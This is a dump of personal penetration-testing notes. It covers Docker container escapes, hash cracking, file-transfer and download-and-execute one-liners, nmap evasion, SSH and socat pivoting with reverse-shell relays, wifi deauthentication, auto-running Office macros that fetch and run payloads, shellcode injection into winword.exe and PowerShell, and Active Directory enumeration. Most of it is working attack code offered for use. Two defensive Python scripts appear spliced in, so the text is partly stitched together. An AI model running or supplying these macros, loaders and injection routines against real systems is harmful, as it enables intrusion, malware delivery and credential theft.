``` 75 | 76 | Or when we have no docker socket but only tcp api. 
77 | ```bash 78 | export DOCKER_HOST="tcp://127.0.0.1:2375" 79 | docker ps 80 | ``` 81 | 82 | --- 83 | ## Mounted Docker Socket 84 | #### Insecure Option 85 | `-v /var/run/docker.sock:/var/run/docker.sock` 86 | #### Why? 87 | Management or monitoring purposes (portainer, sysdig, gitlab runner). 88 | #### Enumeration 89 | Inside of the docker container we can search for docker socket using find command. 90 | ```bash 91 | find / -name docker.sock 2>/dev/null 92 | ``` 93 | #### Exploitaion 94 | If we find the socket, we can start another container using said socket and mount host's filesystem into it, then chroot to the host filesystem. 95 | ```bash 96 | docker run -it -v /:/host IMAGE bash 97 | chroot /host bash 98 | ``` 99 | --- 100 | ## Privileged Container 101 | #### Insecure Option 102 | `--privileged` 103 | #### Why? 104 | Used for monitoring privileged containers. 105 | #### Enumeration 106 | We can use `capsh --print` to enumerate linux capabilities. 107 | #### Exploitation 108 | Then when we can see main harddisk (/dev/sda), we will mount and chroot into it. 109 | ```bash 110 | mount /dev/sda /host 111 | chroot /host bash 112 | ``` 113 | --- 114 | ## Shared Network Namespace 115 | #### Insecure Option 116 | `--network host` 117 | #### Why? 118 | portainer 119 | #### Enumeration 120 | We will use `ip a` to look for host interfaces. 121 | #### Exploitation 122 | Portforward from container to a host. If portainer is present, run new container > mount host's root > chmod into it. 123 | 124 | --- 125 | ## SYS_MODULE Capability 126 | #### Insecure Option 127 | `--cap-add SYS_MODULE` 128 | #### Why? 129 | Monitoring 130 | #### Enumeration 131 | We can use `capsh --print` to enumerate linux capabilities. 132 | #### Exploitation 133 | Create the kernel module. 134 | 135 | Then create a Makefile. 
136 | ```bash 137 | obj-m +=shell.o 138 | 139 | all: 140 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 141 | clean: 142 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 143 | ``` 144 | 145 | Make the module. 146 | ```bash 147 | make 148 | ``` 149 | 150 | And insert the kernel module. 151 | ``` 152 | insmod shell.ko 153 | ``` 154 | --- 155 | ## SYS_PTRACE Capability 156 | #### Insecure Options 157 | `--pid=host --cap-add SYS_PTRACE` 158 | #### Why? 159 | Debugger containers. 160 | #### Enumeration 161 | Watch out for same PID namespace as host. 162 | #### Exploitation 163 | https://0x00sec.org/t/linux-infecting-running-processes/1097 164 | 165 | Update shellcode and compile the code. 166 | 167 | ```bash 168 | ./inject PID 169 | ``` 170 | --- 171 | -------------------------------------------------------------------------------- /Misc/Cracking Hashes.md: -------------------------------------------------------------------------------- 1 | ## Identifying hashes 2 | 3 | ``` 4 | https://hashcat.net/wiki/doku.php?id=example_hashes 5 | https://hashid.zulln.se/ 6 | hashid 7 | ``` 8 | 9 | ## john rules 10 | 11 | ``` 12 | john -wordlist= --rules:All 13 | ``` 14 | 15 | ## Cracking non-salted hashes online 16 | 17 | ``` 18 | https://crackstation.net/ 19 | https://www.hashes.org/search.php 20 | https://hashes.com/en/decrypt/hash 21 | ``` 22 | 23 | ## Cracking password of id\_rsa 24 | 25 | ``` 26 | /usr/share/john/ssh2john.py id_rsa > id_rsa.hashes 27 | john -w /usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hashes 28 | ``` 29 | 30 | ## Cracking passwd/shadow 31 | 32 | ```text 33 | # unshadow 34 | /usr/sbin/unshadow passwd shadow >> crack.me 35 | 36 | # crack with john 37 | john -wordlist=/usr/share/wordlists/rockyou.txt crack.me 38 | 39 | # or with hashcat 40 | hashcat -m 500 -a 0 crack.me /usr/share/wordlists/rockyou.txt -O 41 | ``` 42 | 43 | ## Cracking windows hashes 44 | 45 | ``` 46 | use post/windows/gather/credentials/credential_collector 
```

## Cracking .zip/.rar files

```
zip2john test.zip > zip.hashes
rar2john test.rar > rar.hashes

john zip.hashes
john rar.hashes
```

```
fcrackzip -v -u -D -p wordlist.txt file.zip
```

--------------------------------------------------------------------------------
/Misc/Custom Wordlists.md:
--------------------------------------------------------------------------------
# Custom wordlist generation

## Generating usernames from names

```python
import sys

if len(sys.argv) != 2:
    print("Usage: {} NAMEFILE".format(sys.argv[0]))
    sys.exit(1)

# one "First Last" name per line; blank lines are skipped
for line in open(sys.argv[1]):
    full_name = line.strip()
    if not full_name:
        continue
    tokens = full_name.split()
    fst = tokens[0]
    lst = tokens[-1]

    # common username formats built from first and last name
    print(fst)
    print(lst)
    print(fst[0] + lst)
    print(fst[0] + "." + lst)
    print(fst + lst)
    print(fst + "." + lst)
    print(lst + fst[0])
    print(lst + "." + fst[0])
    print(lst + fst)
    print(lst + "." + fst)
```

## Generating passwords from text

Cewl will generate a wordlist from the contents of a webpage.

```
cewl >> wordlist.txt
```

or this custom python script

```python
import re

# collect every alphanumeric token from a saved page, once each
with open("index.html", "r") as f:
    wordlist = set()
    for line in f.readlines():
        line = re.sub('[^0-9a-zA-Z]+', ' ', line)
        for l in line.split(" "):
            if l:
                wordlist.add("admin:" + l)
    for word in wordlist:
        print(word)
```
--------------------------------------------------------------------------------
/Misc/File Transfers.md:
--------------------------------------------------------------------------------
# file transfers

## Windows

### powershell download

```
(New-Object System.Net.WebClient).DownloadFile('https:///PowerView.ps1',".\PowerView.ps1")
Invoke-WebRequest https:///PowerView.ps1 -OutFile PowerView.ps1
```

### powershell in memory execution

```
IEX (New-Object Net.WebClient).DownloadString('https:///Invoke-Mimikatz.ps1')
Invoke-WebRequest https:///Invoke-Mimikatz.ps1 | iex
```

### if powershell first launch configuration has not been completed

use `-UseBasicParsing`

```
Invoke-WebRequest https:///PowerView.ps1 -UseBasicParsing | iex
```

or disable first run customization

```
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2
```

### powershell uploads

catch with netcat

```
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'c:/' -Encoding Byte))
Invoke-WebRequest -Uri http://: -Method POST -Body $b64
```

### bitsadmin

```
bitsadmin /transfer n http:///nc.exe C:\Temp\nc.exe
```

powershell download or upload using bitsadmin

```
Import-Module bitstransfer;Start-BitsTransfer -Source "http:///nc.exe" -Destination "C:\Temp\nc.exe"
Start-BitsTransfer "C:\" -Destination "http:///uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql
```

### certutil

```
certutil.exe -verifyctl -split -f http:///nc.exe
```

## Netcat

```
# source
nc -nv <

# destination
nc -lvnp >
```

## Powercat

```
# source
powercat -c -p -i C:\

# destination
powercat -l -p -of C:\
```

## Socat

```
# source
socat TCP4-LISTEN:,fork file:

# destination
socat TCP4:: file:,create
```

## HTTP server + Powershell

```
# create server on attacker machine with one of these
python3 -m http.server
python2 -m SimpleHTTPServer
php -S 0.0.0.0:
ruby -run -e httpd . -p
busybox httpd -f -p

# download with powershell oneliner
## download file
(New-Object System.Net.WebClient).DownloadFile("","")

## execute powershell script without touching disk
iex (New-Object System.Net.WebClient).DownloadString("")

## upload file
(New-Object System.Net.WebClient).UploadFile("", "")
```

## pure-ftp

```
# ftp server needs to be configured before

echo open 21 > ftp.txt
echo user >> ftp.txt
echo >> ftp.txt
echo bin >> ftp.txt
echo get >> ftp.txt
echo bye >> ftp.txt

ftp -v -n -s:ftp.txt
```

## exe2hex

```
upx -9
exe2hex -x -p .cmd
# copy paste into target terminal
```

## If everything fails, base64

--------------------------------------------------------------------------------
/Misc/Firewall Evasion.md:
--------------------------------------------------------------------------------
# Firewall/IDS evasion

## Fragmentation

Fragmenting of packets can be turned on using the `-f` option in nmap.

Fragmentation doesn't work with every type of scan, for example `-sT` or `-sV`.

Instead of using `-f`, we can use `--mtu` for a custom fragment size (must be a multiple of 8).

## Decoys

Evasion using decoys works by sending packets from spoofed IPs (it's best if the spoofed IPs belong to real machines).

Decoys can be turned on using the `-D` option.

```bash
nmap -sS -D DECOY1,DECOY2,DECOY3,ME RHOST
```

Without specifying `ME`, nmap will place your IP in a random position among the decoys.

You cannot use `-sT` and `-sV` scans with decoy mode enabled.

## Timing

Only slows down scanning, doesn't alter packets in any way.

Use the `-T` option to specify timing.

|Option|Delay|
|---|---|
|-T0|5 min|
|-T1|15 sec|
|-T2|0.4 sec|
|-T3|default|
|-T4|10 millisec|
|-T5|5 millisec|

## Source ports

Changing the source port to 53, 80 or 443 can also help.

Use the `--source-port` or `-g` option.

```bash
nmap -sS --source-port 53 RHOST
```
--------------------------------------------------------------------------------
/Misc/Recon.md:
--------------------------------------------------------------------------------
amass enum -ip -src -d DOMAIN -dir OUT
amass viz -d3 -dir INPUT

theharvester -d DOMAIN -b all
theharvester -d DOMAIN -b all -n

rustscan -a IP -- -sVC -oN nmap-tcp
sudo nmap -sU IP -oN nmap-udp

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-110000.txt
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/raft-large-directories.txt

ffuf -w ~/wordlists/raft.txt -u http://IP/FUZZ/
ffuf -w ~/wordlists/subdomains.txt -u http://IP/ -H 'Host: FUZZ.DOMAIN'
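The Firewall/IDS evasion notes above describe what `-f`, `--mtu` and `--source-port` change on the wire. The script below is an added example, not part of these notes or of any tool they mention, showing how two of those tricks look to a sensor and how a defender can flag them: first fragments too small to carry a TCP header (what `-f` produces, since the TCP flags sit at byte 13 and an 8-byte first fragment only holds the ports and sequence number) and one well-known source port reused against many destination ports of a single host (`-g 53`). The packet records, addresses and thresholds are constructed for the example; decoys (`-D`) are left out because each decoy address looks like an independent scanner to this logic.

```python
"""Detect two nmap evasion tricks from the notes above: tiny IP fragments
(-f / --mtu) and a fixed well-known source port (-g / --source-port).
Added example; the packet records below are constructed, not captured."""
from collections import defaultdict

# Constructed packet records, one per IP packet as a sensor would log them.
# frag_off is the IP fragment offset in 8-byte units, mf the More Fragments
# flag, ip_len the IP payload length in bytes. Ports are None on fragments
# that do not carry the transport header.
PACKETS = [
    # a DNS answer from a real resolver: source port 53, one client port
    {"src": "10.0.0.53", "sport": 53, "dst": "10.0.1.5", "dport": 41022,
     "mf": False, "frag_off": 0, "ip_len": 120},
    # an ordinary web response, not fragmented
    {"src": "10.0.0.80", "sport": 80, "dst": "10.0.1.5", "dport": 51234,
     "mf": False, "frag_off": 0, "ip_len": 1400},
    # a SYN fragmented with -f: 20-byte TCP header split into 8 + 8 + 4 bytes
    {"src": "10.0.9.9", "sport": 40001, "dst": "10.0.1.5", "dport": 22,
     "mf": True, "frag_off": 0, "ip_len": 8},
    {"src": "10.0.9.9", "sport": None, "dst": "10.0.1.5", "dport": None,
     "mf": True, "frag_off": 1, "ip_len": 8},
    {"src": "10.0.9.9", "sport": None, "dst": "10.0.1.5", "dport": None,
     "mf": False, "frag_off": 2, "ip_len": 4},
]
# the same scanner probing 20 ports with --source-port 53
PACKETS += [
    {"src": "10.0.9.9", "sport": 53, "dst": "10.0.1.5", "dport": port,
     "mf": False, "frag_off": 0, "ip_len": 20}
    for port in range(20, 40)
]

TRUSTED_SOURCE_PORTS = (53, 80, 443)


def fixed_source_port_scanners(packets, ports=TRUSTED_SOURCE_PORTS, min_dports=10):
    """Return {(src, sport, dst): distinct destination port count} for sources
    that reuse one well-known source port against many ports of a single host.
    A real DNS or web server answers to a few client ports, not to a port range."""
    seen = defaultdict(set)
    for p in packets:
        if p["frag_off"] == 0 and p["sport"] in ports:
            seen[(p["src"], p["sport"], p["dst"])].add(p["dport"])
    return {key: len(dports) for key, dports in seen.items() if len(dports) >= min_dports}


def tiny_first_fragments(packets, min_transport_header=20):
    """Return first fragments too small to hold a full TCP header (20 bytes).
    nmap -f emits 8-byte fragments, so the flags a filter would inspect sit in
    a later fragment; a filter that does not reassemble never sees them."""
    return [p for p in packets
            if p["mf"] and p["frag_off"] == 0 and p["ip_len"] < min_transport_header]


def report(packets):
    """Human-readable findings, returned as a list so callers can check them."""
    lines = []
    for (src, sport, dst), n in sorted(fixed_source_port_scanners(packets).items()):
        lines.append(f"{src} used source port {sport} against {n} ports on {dst}")
    for p in tiny_first_fragments(packets):
        lines.append(f"{p['src']} sent a {p['ip_len']}-byte first fragment to {p['dst']}:{p['dport']}")
    return lines


if __name__ == "__main__":
    for line in report(PACKETS):
        print(line)
```

The threshold of ten distinct destination ports is arbitrary; on a real sensor it should be tuned per service, since a busy resolver legitimately answers to many client ports, but only ever to high ephemeral ports rather than a contiguous low range.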
--------------------------------------------------------------------------------
/Misc/SSH Forward Connections.md:
--------------------------------------------------------------------------------
# SSH forward connection

## Port forwarding

```
ssh -L LPORT:RHOST:RPORT USER@RHOST -fN
```

## Proxies

```
ssh -D LPORT USER@RHOST -fN
cp /etc/proxychains.conf .
vim proxychains.conf
proxychains COMMAND
```
--------------------------------------------------------------------------------
/Misc/SSH Remote Connections.md:
--------------------------------------------------------------------------------
# SSH remote connections

```
ssh-keygen
vim ~/.ssh/authorized_keys
command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty PUBLICKEY
sudo systemctl status ssh
sudo systemctl start ssh
ssh -R LPORT:RHOST:RPORT USER@LHOST -i KEYFILE -fN
```

> By editing the SSH config file (usually /etc/ssh/sshd_config on Linux), you can set GatewayPorts to yes and then it should allow SSH tunnels to listen on the other interfaces.
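The `command=`, `no-agent-forwarding`, `no-x11-forwarding` and `no-pty` options above, together with the GatewayPorts note, are exactly what a defender checks when reviewing a host for forwarding-only or unexpected keys (the same file the Linux persistence notes later add a key to). The script below is an added example, not from these notes: it parses authorized_keys option fields (including quoted values containing commas and spaces, which a naive split breaks), reports which restrictions each key lacks using sshd's `restrict`/`permit-*` semantics, and reads the effective GatewayPorts value from an sshd_config, where the first occurrence of a keyword wins. All key material, comments and config text are constructed placeholders.

```python
"""Audit authorized_keys restriction options and the effective GatewayPorts
setting. Added example, not from the notes; sample data is constructed."""

# Constructed sample; the key blobs are placeholders, not real keys.
AUTHORIZED_KEYS = """\
# forwarding-only account, as in the notes above
command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYDATA forwarder@relay
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDEXAMPLEKEYDATA unrestricted@laptop
restrict,from="10.0.0.0/8,192.168.1.1" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIANOTHEREXAMPLE admin@bastion
"""

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def _first_field(s):
    """Split at the first whitespace outside double quotes: (field, rest)."""
    quoted = False
    for i, c in enumerate(s):
        if c == '"' and (i == 0 or s[i - 1] != "\\"):
            quoted = not quoted
        elif c.isspace() and not quoted:
            return s[:i], s[i:].lstrip()
    return s, ""


def _split_options(field):
    """Split the comma-separated options field, keeping quoted commas intact."""
    options, current, quoted = [], [], False
    for i, c in enumerate(field):
        if c == '"' and (i == 0 or field[i - 1] != "\\"):
            quoted = not quoted
        if c == "," and not quoted:
            options.append("".join(current))
            current = []
        else:
            current.append(c)
    options.append("".join(current))
    return options


def parse_authorized_keys(text):
    """Yield {"options", "type", "comment"} for each key line."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first, rest = _first_field(line)
        if first.startswith(KEY_TYPE_PREFIXES):   # no options field
            options, key_type = [], first
        else:
            options = _split_options(first)
            key_type, rest = _first_field(rest)
        _, comment = _first_field(rest)            # skip the base64 blob
        yield {"options": options, "type": key_type, "comment": comment}


def _allowed(options, feature):
    """sshd semantics: no-X disables X; restrict disables all except permit-X."""
    if f"no-{feature}" in options:
        return False
    if "restrict" in options:
        return f"permit-{feature}" in options
    return True


def audit_key(key):
    """Return the list of missing restrictions for one parsed key entry."""
    opts = key["options"]
    findings = []
    if not any(o.startswith("command=") for o in opts):
        findings.append("no forced command")
    if not any(o.startswith("from=") for o in opts):
        findings.append("no source restriction")
    for feature in ("pty", "agent-forwarding", "x11-forwarding", "port-forwarding"):
        if _allowed(opts, feature):
            findings.append(f"{feature} allowed")
    return findings


def audit(text):
    """Map each key's comment to its findings."""
    return {k["comment"]: audit_key(k) for k in parse_authorized_keys(text)}


def gateway_ports(sshd_config):
    """Effective GatewayPorts value. sshd keeps the FIRST occurrence of a
    keyword, so a hardening line appended to the end of the file is ignored."""
    for raw in sshd_config.splitlines():
        parts = raw.split("#", 1)[0].split(None, 1)
        if len(parts) == 2 and parts[0].lower() == "gatewayports":
            return parts[1].strip().lower()
    return "no"  # sshd default


if __name__ == "__main__":
    for comment, findings in audit(AUTHORIZED_KEYS).items():
        print(comment, "->", ", ".join(findings) or "ok")
    print("GatewayPorts:", gateway_ports("GatewayPorts yes\nGatewayPorts no\n"))
```

For the forwarding-only key from the notes the audit reports only that port forwarding is still allowed (its purpose) and that no `from=` restriction limits where it can be used from; the unrestricted laptop key trips every check, and the `restrict,from=` key only lacks a forced command.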

```
ssh -R LPORT USER@LHOST -i KEYFILE -fN
```
--------------------------------------------------------------------------------
/Misc/Socat.md:
--------------------------------------------------------------------------------
# Socat

[https://github.com/3ndG4me/socat/releases/tag/v1.7.3.3](https://github.com/3ndG4me/socat/releases/tag/v1.7.3.3)

[linux](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)
[windows](https://sourceforge.net/projects/unix-utils/files/socat/1.7.3.2/socat-1.7.3.2-1-x86_64.zip/download)

## Reverse shell relay

This way we can relay reverse shells over multiple hops.

```
./socat tcp-l:LPORT tcp:RHOST:RPORT &
```

## Port forwarding (fast n' ugly)

```
./socat tcp-l:LPORT,fork,reuseaddr tcp:RHOST:RPORT &
```

## Port forward (advanced)

First of all, on our own attacking machine, we issue the following command:
```
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```

This opens up two ports, 8000 and 8001, creating a local port relay: what goes into one of them comes out of the other. Port 8000 also has the fork and reuseaddr options set, to allow us to create more than one connection through this port forward.

Next, on the compromised relay server (172.16.0.5 in the previous example) we execute this command:
```
./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &
```

This makes a connection between our listening port 8001 on the attacking machine and the open port of the target server.
To use the fictional network from before, we could enter this command as:
```
./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork &
```

--------------------------------------------------------------------------------
/Misc/Wireless Security.md:
--------------------------------------------------------------------------------

# WEF
https://github.com/D3Ext/WEF

# Wifite
sudo wifite -mac --skip-crack --clients-only -wpa --no-wps --no-pmkid

https://hashcat.net/cap2hashcat/

hashcat.exe -m 22000 HASHFILE -a 3 ?d?d?d?d?d?d?d?d?d

# The old way
```bash
airmon-ng check
airmon-ng check kill
airmon-ng start INTERFACE
airodump-ng INTERFACE
airodump-ng INTERFACE --bssid APMAC -c CHANNEL -w CAPFILE
aireplay-ng INTERFACE --deauth 20 -a APMAC -h CLIENTMAC
aircrack-ng -w WORDLIST CAPFILE
airmon-ng stop INTERFACE
systemctl start network-manager
```
--------------------------------------------------------------------------------
/P300/1. Client Side Code Execution With Office.md:
--------------------------------------------------------------------------------
# VBA Macro 101
```vb
Sub MyMacro()
    Dim name As String
    Dim age As Long
    Dim pointer As LongPtr

    age = 18
    If age >= 18 Then
        MsgBox ("if")
    Else
        MsgBox ("else")
    End If

    For i = 1 To 4
        MsgBox (i)
    Next i

    Dim cmd1 As String
    cmd1 = "cmd.exe"
    Shell cmd1, vbHide

    Dim cmd2 As String
    cmd2 = "cmd.exe"
    CreateObject("Wscript.Shell").Run cmd2, 0
End Sub
```

# Autorun
```vb
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub Workbook_Open()
    MyMacro
End Sub
```

# Command Execution
```vb
Dim cmd As String
cmd = "calc.exe"
Shell cmd, 0

Dim cmd As String
cmd = "calc.exe"
CreateObject("Wscript.Shell").Run cmd, 0
```

# Download to disk and execute
```vb
Sub MyMacro()
    Dim downloader As String
    downloader = "powershell.exe (New-Object Net.WebClient).DownloadFile('URL', 'OUTFILE')"
    CreateObject("Wscript.Shell").Run downloader, 0

    Wait (4)

    Dim executable As String
    executable = ActiveDocument.path + "\OUTFILE"
    Shell executable, 0
End Sub

Sub Wait(delay As Long)
    Dim start As Date
    start = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", delay, start)
End Sub
```

# Pretext
Select the decrypted text and navigate to Insert > Quick Parts > AutoTexts and Save Selection to AutoText Gallery, with the name Content.

```vb
Sub Decrypt()
    ActiveDocument.Content.Select
    Selection.Delete
    ActiveDocument.AttachedTemplate.AutoTextEntries("Content").Insert Where:=Selection.Range, RichText:=True
End Sub
```

# Injecting shellcode into winword.exe
Get function declarations from pinvoke.net
```vb
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Gkuenc As Long, ByVal Jzbgjtn As Long, ByVal Hihijhmu As LongPtr, Xnn As Long, ByVal Sdcrgxe As Long, Onxeicbxx As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kwslq As Long, ByVal Elatcsga As Long, ByVal Wvzghg As Long, ByVal Qbqhwrhcw As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Nai As LongPtr, ByRef Mdhui As Any, ByVal Bncuuvusw As Long) As LongPtr
Private Declare PtrSafe Function VirtualProtectEx Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flNewProtect As Long, ByRef lpflOldProtect As LongPtr) As Long
Private Declare PtrSafe Function GetCurrentProcess Lib "kernel32" () As LongPtr

Sub Auto_Open()
    Dim tmp As Long, payload As Variant, i As Long
    Dim memory As LongPtr, result As LongPtr
    Dim r As Long

    payload = Array(....SNIP....)

    memory = VirtualAlloc(0, UBound(payload), &H1000, &H4)

    For i = LBound(payload) To UBound(payload)
        tmp = payload(i)
        result = RtlMoveMemory(memory + i, tmp, 1)
    Next i

    r = VirtualProtectEx(GetCurrentProcess(), memory, UBound(payload), &H20, 0)

    result = CreateThread(0, 0, memory, 0, 0, 0)
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub
```
---
# Injecting shellcode into powershell.exe (meh)
```powershell
$Kernel32 = @"
using System;
using System.Runtime.InteropServices;
public class Kernel32 {
    [DllImport("kernel32")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32", CharSet=CharSet.Ansi)]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@
Add-Type $Kernel32

[Byte[]] $buf = ....SNIP....
$size = $buf.Length
[IntPtr]$addr = [Kernel32]::VirtualAlloc(0,$size,0x3000,0x40);
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size);
$thandle=[Kernel32]::CreateThread(0,0,$addr,0,0,0);
[Kernel32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
```

```vb
Sub Auto_Open()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadString('URL') | IEX"
    Shell str, vbHide
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub
```

# .NET Framework Reflection (without touching the disk)
```powershell
function LookupFunc {
    Param ($moduleName, $functionName)
    $assembly = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object {
        $_.GlobalAssemblyCache -and $_.Location.Split("\\")[-1].Equals("System.dll")
    }).gettype("Microsoft.Win32.UnsafeNativeMethods")
    $methods = @()
    $assembly.getMethods() | foreach-object {if($_.name -eq "GetProcAddress") {$methods+=$_}}
    return $methods[0].Invoke($null, @(($assembly.getMethod("GetModuleHandle")).invoke($null, @($moduleName)), $functionName))
}

function getDelegateType {
    param([Parameter(position = 0, Mandatory = $true)] [AllowEmptyCollection()] [Type[]] $func,[Parameter(position = 1)] [Type] $delType = [Void])
    $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule", $false).DefineType("MyDelegateType", "Class, Public, Sealed, AnsiClass, AutoClass", [System.MulticastDelegate])
    $type.DefineConstructor("RTSpecialName, HideBySig, Public", [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags("Runtime, Managed")
    $type.DefineMethod("Invoke", "Public, HideBySig, NewSlot, Virtual", $delType, $func).SetImplementationFlags("Runtime, Managed")
    return $type.CreateType()
}

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
    (LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))
).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x4)

[Byte[]] $buf = ....SNIP....

[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)

$ret = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
    (lookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))
).Invoke($lpMem, [uint32]$buf.Length, 0x20, [ref]0)

$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
    (LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))
).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)

$ret = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
    (LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32]) ([Int]))
).Invoke($hThread, 0xFFFFFFFF)
```

```vb
Sub Auto_Open()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadString('URL') | iex"
    Shell str, vbHide
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub
```

# Powershell WebClient shenanigans
```powershell
[System.Net.WebRequest]::DefaultWebProxy.GetProxy("http://melnicek.github.io")
```

```powershell
$client = New-Object System.Net.WebClient
$client.Headers.Add("User-Agent", "UAGENT")
$client.DownloadString("URL")
```

```powershell
$client = new-object system.net.WebClient
$client.proxy = $null
$client.DownloadString("URL")
```

```powershell
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem 'HKU:\'
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}
$proxyAddr = (Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://$proxyAddr")
$wc = new-object system.net.WebClient
$wc.DownloadString("URL")
```

--------------------------------------------------------------------------------
/P300/2. Client Side Code Execution With Windows Script Host.md:
--------------------------------------------------------------------------------
# JScript 101
```js
var url = "URL";
var Object = WScript.CreateObject("MSXML2.XMLHTTP");
Object.Open("GET", url, false);
Object.Send();

if(Object.Status == 200) {
    var Stream = WScript.CreateObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.Position = 0;

    Stream.SaveToFile("OUTFILE", 2);
    Stream.Close();
}
var r = new ActiveXObject("WScript.Shell").Run("OUTFILE");
```

# SharpShooter
https://github.com/mdsecactivebreach/SharpShooter

# In-Memory PowerShell
```powershell
$data = (New-Object System.Net.WebClient).DownloadData('URL')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)
```
--------------------------------------------------------------------------------
/Pasted image 20220801123813.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/melnicek/notes/8bfef9acc8615f7591d9c00977f586b7cbf43895/Pasted image 20220801123813.png
--------------------------------------------------------------------------------
/Pentesting Active Directory/0. Active Directory 101.md:
--------------------------------------------------------------------------------

[HTB - AD 101](https://www.hackthebox.com/home/tracks/4)
[HTB - AD 101 Walkthrough](https://www.youtube.com/playlist?list=PLrmSJpHp5WGg4sUndkYBg8B5qO2COSxS4)

[TryHackMe - Hacking Active Directory](https://tryhackme.com/module/hacking-active-directory)
[TryHackMe - Hacking Active Directory Walkthrough](https://www.youtube.com/playlist?list=PLmDlGk9PnoAOPh7-epS-ZOoPyMyeJZ9Wp)

[VBScrub](https://www.youtube.com/channel/UCpoyhjwNIWZmsiKNKpsMAQQ/videos)
--------------------------------------------------------------------------------
/Pentesting Active Directory/Active Directory Enumeration.md:
--------------------------------------------------------------------------------
# Active Directory enumeration

## Downloading our tools

We can download files onto disk using:
`certutil.exe` inside cmd,
`Invoke-WebRequest` (or its wget/curl alias) inside powershell.

```powershell
certutil.exe -urlcache -f http://RHOST:RPORT/file.ps1 file.ps1
Invoke-WebRequest http://RHOST:RPORT/file.ps1 -OutFile file.ps1
```

We can also load files straight into memory using `iex`.

```powershell
iex (New-Object Net.WebClient).DownloadString("http://RHOST:RPORT/file.ps1")
```

## Enumerating users

```powershell
Get-NetUser
Get-NetUser | Select cn
Get-NetUser | Select -ExpandProperty samaccountname
Find-UserField -SearchField description "pass"
Invoke-EnumerateLocalAdmin
```

## Enumerating groups

```powershell
Get-NetGroup
